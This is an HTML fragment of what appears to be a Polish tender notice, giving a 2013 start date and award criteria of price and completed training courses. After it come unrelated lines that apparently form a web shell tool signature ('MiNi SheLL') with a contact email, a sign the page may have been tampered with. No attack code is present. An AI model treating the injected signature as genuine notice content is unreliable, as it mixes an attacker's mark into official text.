<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 22.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. wykoaz zrealizowanych szkoleń - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com